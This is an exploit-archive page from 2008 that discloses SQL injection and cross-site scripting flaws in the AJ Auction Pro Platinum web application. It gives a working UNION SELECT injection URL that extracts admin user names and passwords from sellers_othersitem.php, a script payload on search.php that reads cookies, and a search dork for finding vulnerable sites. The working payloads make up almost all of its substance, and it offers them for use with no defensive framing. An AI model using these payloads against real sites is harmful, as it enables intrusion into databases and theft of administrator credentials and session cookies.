[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability
# Published : 2008-09-25
# Author : InjEctOr5
# Previous Title : RPG.Board <= 0.0.8Beta2 (showtopic) SQL Injection Vulnerability
# Next Title : LanSuite 3.3.2 (design) Local File Inclusion Vulnerability
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> Kings of injection |
| /___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Xss /Remote SQL injection
Script : Aj auction platinum2 , last version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
=========================================================================
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin--
[Xss]
=========================================================================
EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script>
=========================================================================
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
thanx str0ke/*
# www.Syue.com [2008-09-25]